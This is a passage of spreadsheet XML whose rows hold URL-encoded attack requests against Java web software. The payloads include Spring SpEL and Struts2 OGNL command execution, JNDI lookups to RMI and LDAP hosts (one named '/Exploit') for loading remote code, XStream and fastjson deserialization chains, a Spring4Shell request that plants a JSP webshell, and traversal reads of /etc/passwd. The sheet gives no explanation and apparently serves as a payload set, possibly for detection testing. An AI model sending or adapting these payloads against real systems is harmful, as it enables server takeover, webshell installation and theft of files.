        <v>PATCH%20%2Fcustomers%2F1%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_2%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1944.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson-patch%2Bjson%0A%0A%5B%7B%20%22op%22%3A%20%22replace%22%2C%20%22path%22%3A%20%22T%28java.lang.Runtime%29.getRuntime%28%29.exec%28new%20java.lang.String%28new%20byte%5B%5D%7B116%2C111%2C117%2C99%2C104%2C32%2C47%2C116%2C109%2C112%2C47%2C115%2C117%2C99%2C99%2C101%2C115%2C115%7D%29%29%2Flastname%22%2C%20%22value%22%3A%20%22vulhub%22%20%7D%5D</v>
      </c>
    </row>
    <row r="21" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A21" s="2" t="s">
        <v>18</v>
      </c>
      <c r="B21" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C21" t="s">
        <v>142</v>
      </c>
      <c r="D21" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fusers%3Fpage%26size%3D5%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.1916.47%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20124%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0APragma%3A%20no-cache%0A%0Ausername%5B%23this.getClass%28%29.forName%28%22java.lang.Runtime%22%29.getRuntime%28%29.exec%28%22touch%20%2Ftmp%2Fsuccess%22%29%5D%3D%26password%3D%26repeatedPassword%3D</v>
      </c>
    </row>
    <row r="22" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A22" s="2" t="s">
        <v>19</v>
      </c>
      <c r="B22" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C22" t="s">
        <v>143</v>
      </c>
      <c r="D22" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Frobots%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F40.0.2214.93%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="23" spans="1:4" ht="18" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A23" s="2" t="s">
        <v>236</v>
      </c>
      <c r="B23" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C23" t="s">
        <v>247</v>
      </c>
      <c r="D23" t="str">
        <f t="shared" si="0"/>
        <v>Q%ED%80%85w%0F%01%EB%B2%93%ED%80%80%014%3D%CA%80%0As%7D%02%0Fjava.rmi.Remote%1Borg.neo4j.shell.ShellServerpxr%17java.lang.reflect.Proxy%E1%A7%9A%20%CC%90C%CB%82%01L%01ht%25Ljava%2Flang%2Freflect%2FInvocationHandler%3Bpxpsr-java.rmi.server.RemoteObjectInvocationHandler%02%02pxr%1Cjava.rmi.server.RemoteObject%D3%A1%0Ca3%1E%03pxpw8%0AUnicastRef%0F192.168.248.133.D%06H%EA%AB%B2S%ED%80%80%014%3D%CA%80%01%01x</v>
      </c>
    </row>
    <row r="24" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A24" s="2" t="s">
        <v>20</v>
      </c>
      <c r="B24" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C24" t="s">
        <v>144</v>
      </c>
      <c r="D24" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.1%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2227.0%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="25" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A25" s="2" t="s">
        <v>21</v>
      </c>
      <c r="B25" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C25" t="s">
        <v>145</v>
      </c>
      <c r="D25" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%2525u002e%2FWEB-INF%2Fweb.xml%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="26" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A26" s="2" t="s">
        <v>22</v>
      </c>
      <c r="B26" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C26" t="s">
        <v>146</v>
      </c>
      <c r="D26" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Foauth%2Fauthorize%3Fresponse_type%3D%24%7B2%2A3%7D%26client_id%3Dacme%26scope%3Dopenid%26redirect_uri%3Dhttp%3A%2F%2Ftest%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.3319.102%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0AAuthorization%3A%20Basic%20YWRtaW46YWRtaW4%3D%0A</v>
      </c>
    </row>
    <row r="27" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A27" s="2" t="s">
        <v>23</v>
      </c>
      <c r="B27" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C27" t="s">
        <v>147</v>
      </c>
      <c r="D27" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F..%252f..%252f..%252f..%252f..%252fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20Ubuntu%3B%20Linux%20i686%20on%20x86_64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F53.0.2820.59%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="28" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A28" s="2" t="s">
        <v>24</v>
      </c>
      <c r="B28" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C28" t="s">
        <v>148</v>
      </c>
      <c r="D28" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fgs-guide-websocket%2F754%2Ffg20hkt2%2Fxhr_send%3Ft%3D1646903360968%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_4%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F49.0.2656.18%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20134%0AAccept-Encoding%3A%20identity%0A%0A%5B%22SUBSCRIBE%5Cnselector%3AT%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fsuccess%27%29%5Cnid%3Asub-0%5Cndestination%3A%2Ftopic%2Fgreetings%5Cn%5Cn%5Cu0000%22%5D</v>
      </c>
    </row>
    <row r="29" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A29" s="2" t="s">
        <v>25</v>
      </c>
      <c r="B29" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C29" t="s">
        <v>149</v>
      </c>
      <c r="D29" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2FdoUpload.action%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_9_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.1916.47%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201091%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20multipart%2Fform-data%3B%20boundary%3D----WebKitFormBoundaryWx1nMTn6ALWIDGXH%0A%0A------WebKitFormBoundaryWx1nMTn6ALWIDGXH%0AContent-Disposition%3A%20form-data%3B%20name%3D%22upload%22%3B%20filename%3D%22%25%7B%28%23nike%3D%27multipart%2Fform-data%27%29.%28%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28%40com.opensymphony.xwork2.ognl.OgnlUtil%40class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27whoami%27%29.%28%23iswin%3D%28%40java.lang.System%40getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2Fc%27%2C%23cmd%7D%3A%7B%27%2Fbin%2Fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28%23ros%3D%28%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getOutputStream%28%29%29%29.%28%40org.apache.commons.io.IOUtils%40copy%28%23process.getInputStream%28%29%2C%23ros%29%29.%28%23ros.flush%28%29%29%7D%5Cx0b%22%0AContent-Type%3A%20image%2Fjpeg%0A%0A111%0A------WebKitFormBoundaryWx1nMTn6ALWIDGXH%0AContent-Disposition%3A%20form-data%3B%20name%3D%22caption%22%0A%0A%0A------WebKitFormBoundaryWx1nMTn6ALWIDGXH--</v>
      </c>
    </row>
    <row r="30" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A30" s="2" t="s">
        <v>26</v>
      </c>
      <c r="B30" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C30" t="s">
        <v>150</v>
      </c>
      <c r="D30" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Fsolr%2Fadmin%2Fcores%3Faction%3D%24%7Bjndi%3Armi%3A%2F%2F192.168.248.133%3A1099%2Fsm0syp%7D%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%205.1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F35.0.3319.102%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="31" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A31" s="2" t="s">
        <v>27</v>
      </c>
      <c r="B31" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C31" t="s">
        <v>151</v>
      </c>
      <c r="D31" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2F%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.2%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%20like%20Gecko%29%20Chrome%2F44.0.2403.155%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201677%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fxml%0A%0A%3Cjava.util.PriorityQueue%20serialization%3D%27custom%27%3E%20%3Cunserializable-parents%2F%3E%20%3Cjava.util.PriorityQueue%3E%20%3Cdefault%3E%20%3Csize%3E2%3C%2Fsize%3E%20%3C%2Fdefault%3E%20%3Cint%3E3%3C%2Fint%3E%20%3Cjavax.naming.ldap.Rdn_-RdnEntry%3E%20%3Ctype%3E12345%3C%2Ftype%3E%20%3Cvalue%20class%3D%27com.sun.org.apache.xpath.internal.objects.XString%27%3E%20%3Cm__obj%20class%3D%27string%27%3Ecom.sun.xml.internal.ws.api.message.Packet%402002fc1d%20Content%3C%2Fm__obj%3E%20%3C%2Fvalue%3E%20%3C%2Fjavax.naming.ldap.Rdn_-RdnEntry%3E%20%3Cjavax.naming.ldap.Rdn_-RdnEntry%3E%20%3Ctype%3E12345%3C%2Ftype%3E%20%3Cvalue%20class%3D%27com.sun.xml.internal.ws.api.message.Packet%27%20serialization%3D%27custom%27%3E%20%3Cmessage%20class%3D%27com.sun.xml.internal.ws.message.saaj.SAAJMessage%27%3E%20%3CparsedMessage%3Etrue%3C%2FparsedMessage%3E%20%3CsoapVersion%3ESOAP_11%3C%2FsoapVersion%3E%20%3CbodyParts%2F%3E%20%3Csm%20class%3D%27com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl%27%3E%20%3CattachmentsInitialized%3Efalse%3C%2FattachmentsInitialized%3E%20%3CnullIter%20class%3D%27com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver%24KeyStoreIterator%27%3E%20%3Caliases%20class%3D%27com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl%27%3E%20%3Ccandidates%20class%3D%27com.sun.jndi.rmi.registry.BindingEnumeration%27%3E%20%3Cnames%3E%20%3Cstring%3Eaa%3C%2Fstring%3E%20%3Cstring%3Eaa%3C%2Fstring%3E%20%3C%2Fnames%3E%20%3Cctx%3E%20%3Cenvironment%2F%3E%20%3Cregistry%20class%3D%27sun.rmi.registry.RegistryImpl_Stub%27%20serialization%3D%27custom%27%3E%20%3Cjava.rmi.server.RemoteObject%3E%20%3Cstring%3EUnicastRef%3C%2Fstring%3E%20%3Cstring%3E192.168.248.132%3C%2Fstring%3E%20%3Cint%3E4444%3C%2Fint%3E%20%3Clong%3E0%3C%2Flong%3E%20%3Cint%3E0%3C%2Fint%3E%20%3Clong%3E0%3C%2Flong%3E%20%3Cshort%3E0%3C%2Fshort%3E%20%3Cboolean%3Efalse%3C%2Fboolean%3E%20%3C%2Fjava.rmi.server.RemoteObject%3E%20%3C%2Fregistry%3E%20%3Chost%3E192.168.248.132%3C%2Fhost%3E%20%3Cport%3E4444%3C%2Fport%3E%20%3C%2Fctx%3E%20%3C%2Fcandidates%3E%20%3C%2Faliases%3E%20%3C%2FnullIter%3E%20%3C%2Fsm%3E%20%3C%2Fmessage%3E%20%3C%2Fvalue%3E%20%3C%2Fjavax.naming.ldap.Rdn_-RdnEntry%3E%20%3C%2Fjava.util.PriorityQueue%3E%20%3C%2Fjava.util.PriorityQueue%3E</v>
      </c>
    </row>
    <row r="32" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A32" s="2" t="s">
        <v>28</v>
      </c>
      <c r="B32" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C32" t="s">
        <v>152</v>
      </c>
      <c r="D32" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Ftestfj%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F54.0.2866.71%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%20135%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%22%40type%22%3A%20%22org.apache.ibatis.datasource.jndi.JndiDataSourceFactory%22%2C%20%22properties%22%3A%20%7B%22data_source%22%3A%20%22ldap%3A%2F%2F192.168.1.11%3A1389%2FExploit%22%7D%7D</v>
      </c>
    </row>
    <row r="33" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A33" s="2" t="s">
        <v>21</v>
      </c>
      <c r="B33" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C33" t="s">
        <v>145</v>
      </c>
      <c r="D33" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%2525u002e%2FWEB-INF%2Fweb.xml%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="34" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A34" s="2" t="s">
        <v>237</v>
      </c>
      <c r="B34" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C34" t="s">
        <v>248</v>
      </c>
      <c r="D34" t="str">
        <f t="shared" si="0"/>
        <v>t3%2012.2.1%0AAS%3A255%0AHL%3A19%0AMS%3A10000000%0APU%3At3%3A%2F%2Fus-l-breens%3A7001%0A</v>
      </c>
    </row>
    <row r="35" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A35" s="2" t="s">
        <v>238</v>
      </c>
      <c r="B35" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C35" t="s">
        <v>249</v>
      </c>
      <c r="D35" t="str">
        <f t="shared" si="0"/>
        <v>%124%01%02%02%08HTTP%2F1.1%05%2Fasdf%0F192.168.248.133%0F192.168.248.133P%09%06%0Akeep-alive%0FAccept-Language%0Een-US%2Cen%3Bq%3D0.5%08%010%0FAccept-Encoding%13gzip%2C%20deflate%2C%20sdch%0ACache-Control%09max-age%3D0%0E%20Mozilla%19Upgrade-Insecure-Requests%011%01%09text%2Fhtml%0B%0F192.168.248.133%0A%21javax.servlet.include.request_uri%01%2F%0A%1Fjavax.servlet.include.path_info%0FWEB-INF%2Fweb.xml%0A%22javax.servlet.include.servlet_path%01%2F</v>
      </c>
    </row>
    <row r="36" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A36" s="2" t="s">
        <v>29</v>
      </c>
      <c r="B36" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C36" t="s">
        <v>153</v>
      </c>
      <c r="D36" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fexploit%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%206.3%3B%20WOW64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F41.0.2225.0%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%201298%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fjson%0A%0A%7B%0A%20%20%22param%22%3A%20%5B%0A%20%20%20%20%22com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl%22%2C%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%22transletBytecodes%22%3A%20%5B%0A%20%20%22yv66vgAAADMAKAoABAAUCQADABUHABYHABcBAAVwYXJhbQEAEkxqYXZhL2xhbmcvT2JqZWN0OwEABjxpbml0PgEAAygpVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAcTGNvbS9iMW5nei9zZWMvbW9kZWwvVGFyZ2V0OwEACGdldFBhcmFtAQAUKClMamF2YS9sYW5nL09iamVjdDsBAAhzZXRQYXJhbQEAFShMamF2YS9sYW5nL09iamVjdDspVgEAClNvdXJjZUZpbGUBAAtUYXJnZXQuamF2YQwABwAIDAAFAAYBABpjb20vYjFuZ3ovc2VjL21vZGVsL1RhcmdldAEAEGphdmEvbGFuZy9PYmplY3QBAAg8Y2xpbml0PgEAEWphdmEvbGFuZy9SdW50aW1lBwAZAQAKZ2V0UnVudGltZQEAFSgpTGphdmEvbGFuZy9SdW50aW1lOwwAGwAcCgAaAB0BABV0b3VjaCAvdG1wL3Byb3ZlMS50eHQIAB8BAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAAhACIKABoAIwEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHACUKACYAFAAhAAMAJgAAAAEAAgAFAAYAAAAEAAEABwAIAAEACQAAAC8AAQABAAAABSq3ACexAAAAAgAKAAAABgABAAAABgALAAAADAABAAAABQAMAA0AAAABAA4ADwABAAkAAAAvAAEAAQAAAAUqtAACsAAAAAIACgAAAAYAAQAAAAoACwAAAAwAAQAAAAUADAANAAAAAQAQABEAAQAJAAAAPgACAAIAAAAGKiu1AAKxAAAAAgAKAAAACgACAAAADgAFAA8ACwAAABYAAgAAAAYADAANAAAAAAAGAAUABgABAAgAGAAIAAEACQAAABYAAgAAAAAACrgAHhIgtgAkV7EAAAAAAAEAEgAAAAIAEw%3D%3D%22%0A%20%20%20%20%20%20%5D%2C%0A%20%20%20%20%20%20%22transletName%22%3A%20%22a.b%22%2C%0A%20%20%20%20%20%20%22outputProperties%22%3A%20%7B%7D%0A%20%20%20%20%7D%0A%20%20%5D%0A%7D</v>
      </c>
    </row>
    <row r="37" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A37" s="2" t="s">
        <v>30</v>
      </c>
      <c r="B37" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C37" t="s">
        <v>140</v>
      </c>
      <c r="D37" t="str">
        <f t="shared" si="0"/>
        <v>PUT%20%2Ftest1.txt%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_8_3%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F54.0.2866.71%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%2011%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20text%2Fplain%0A%0Atest%20put111</v>
      </c>
    </row>
    <row r="38" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A38" s="2" t="s">
        <v>31</v>
      </c>
      <c r="B38" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C38" t="s">
        <v>154</v>
      </c>
      <c r="D38" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Forders%2F4%2F%28%2523_memberAccess%253d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%29%253f%28%2523wr%253d%2523context%255b%2523parameters.obj%255b0%255d%255d.getWriter%28%29%2C%2523rs%253d%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%2523parameters.command%5B0%5D%29.getInputStream%28%29%29%2C%2523wr.println%28%2523rs%29%2C%2523wr.flush%28%29%2C%2523wr.close%28%29%29%3Axx.toString.json%3Fobj%3Dcom.opensymphony.xwork2.dispatcher.HttpServletResponse%26content%3D16456%26command%3Dcat%2B%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28X11%3B%20OpenBSD%20i386%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F36.0.1985.125%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="39" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A39" s="2" t="s">
        <v>32</v>
      </c>
      <c r="B39" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C39" t="s">
        <v>155</v>
      </c>
      <c r="D39" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2Forders%2F4%2F%2523_memberAccess%253d%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS%2C%2523xx%253d123%2C%2523rs%253d%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%2523parameters.command%5B0%5D%29.getInputStream%28%29%29%2C%2523wr%253d%2523context%5B%2523parameters.obj%5B0%5D%5D.getWriter%28%29%2C%2523wr.print%28%2523rs%29%2C%2523wr.close%28%29%2C%2523xx.toString.json%3Fobj%3Dcom.opensymphony.xwork2.dispatcher.HttpServletResponse%26content%3D2908%26command%3Dcat%2520%2Fetc%2Fpasswd%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%3B%20Win64%3B%20x64%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F70.0.3538.77%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="40" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A40" s="2" t="s">
        <v>33</v>
      </c>
      <c r="B40" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C40" t="s">
        <v>156</v>
      </c>
      <c r="D40" t="str">
        <f t="shared" si="0"/>
        <v>POST%20%2Fgs-guide-websocket%2F881%2Fvfwndejq%2Fwebsocket%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Windows%20NT%2010.0%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F89.0.4389.114%20Safari%2F537.36%0AConnection%3A%20close%0AContent-Length%3A%200%0AAccept-Encoding%3A%20identity%0AContent-Type%3A%20application%2Fx-www-form-urlencoded%0ASelector%3A%20T%28java.lang.Runtime%29.getRuntime%28%29.exec%28%27whoami%27%29%0A</v>
      </c>
    </row>
    <row r="41" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A41" s="2" t="s">
        <v>250</v>
      </c>
      <c r="B41" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C41" t="s">
        <v>251</v>
      </c>
      <c r="D41" t="str">
        <f t="shared" si="0"/>
        <v>t3%2012.2.1%0AAS%3A255%0AHL%3A19%0AMS%3A10000000%0APU%3At3%3A%2F%2Fus-l-breens%3A7002%0A</v>
      </c>
    </row>
    <row r="42" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A42" s="2" t="s">
        <v>128</v>
      </c>
      <c r="B42" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C42" t="s">
        <v>157</v>
      </c>
      <c r="D42" t="str">
        <f t="shared" si="0"/>
        <v>GET%20%2F%3Fclass.module.classLoader.resources.context.parent.pipeline.first.pattern%3D%2525%257Bc2%257Di%2520if%28%2522j%2522.equals%28request.getParameter%28%2522pwd%2522%29%29%29%257B%2520java.io.InputStream%2520in%2520%253D%2520%2525%257Bc1%257Di.getRuntime%28%29.exec%28request.getParameter%28%2522cmd%2522%29%29.getInputStream%28%29%253B%2520int%2520a%2520%253D%2520-1%253B%2520byte%255B%255D%2520b%2520%253D%2520new%2520byte%255B2048%255D%253B%2520while%28%28a%253Din.read%28b%29%29%21%253D-1%29%257B%2520out.println%28new%2520String%28b%29%29%253B%2520%257D%2520%257D%2520%2525%257Bsuffix%257Di%26class.module.classLoader.resources.context.parent.pipeline.first.suffix%3D.jsp%26class.module.classLoader.resources.context.parent.pipeline.first.directory%3Dwebapps%2FROOT%26class.module.classLoader.resources.context.parent.pipeline.first.prefix%3Dtomcatwar%26class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat%20HTTP%2F1.1%0AUser-Agent%3A%20Mozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010_10_1%29%20AppleWebKit%2F537.36%20%28KHTML%2C%20like%20Gecko%29%20Chrome%2F37.0.2062.124%20Safari%2F537.36%0AConnection%3A%20close%0AAccept-Encoding%3A%20identity%0A</v>
      </c>
    </row>
    <row r="43" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A43" s="2" t="s">
        <v>127</v>
      </c>
      <c r="B43" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C43" t="s">
        <v>252</v>
      </c>
      <c r="D43" t="str">
        <f t="shared" si="0"/>
        <v>t3%2010.3.6%0AAS%3A255%0AHL%3A19%0A</v>
      </c>
    </row>
    <row r="44" spans="1:4" ht="14.6" thickBot="1" x14ac:dyDescent="0.4">
      <c r="A44" s="2" t="s">
        <v>126</v>
      </c>
      <c r="B44" s="3" t="s">
        <v>1</v>
      </c>
      <c r="C44" t="s">
        <v>158</v>
      </c>
      <c r="D44" t="str">
        <f t="shared" si="0"/>
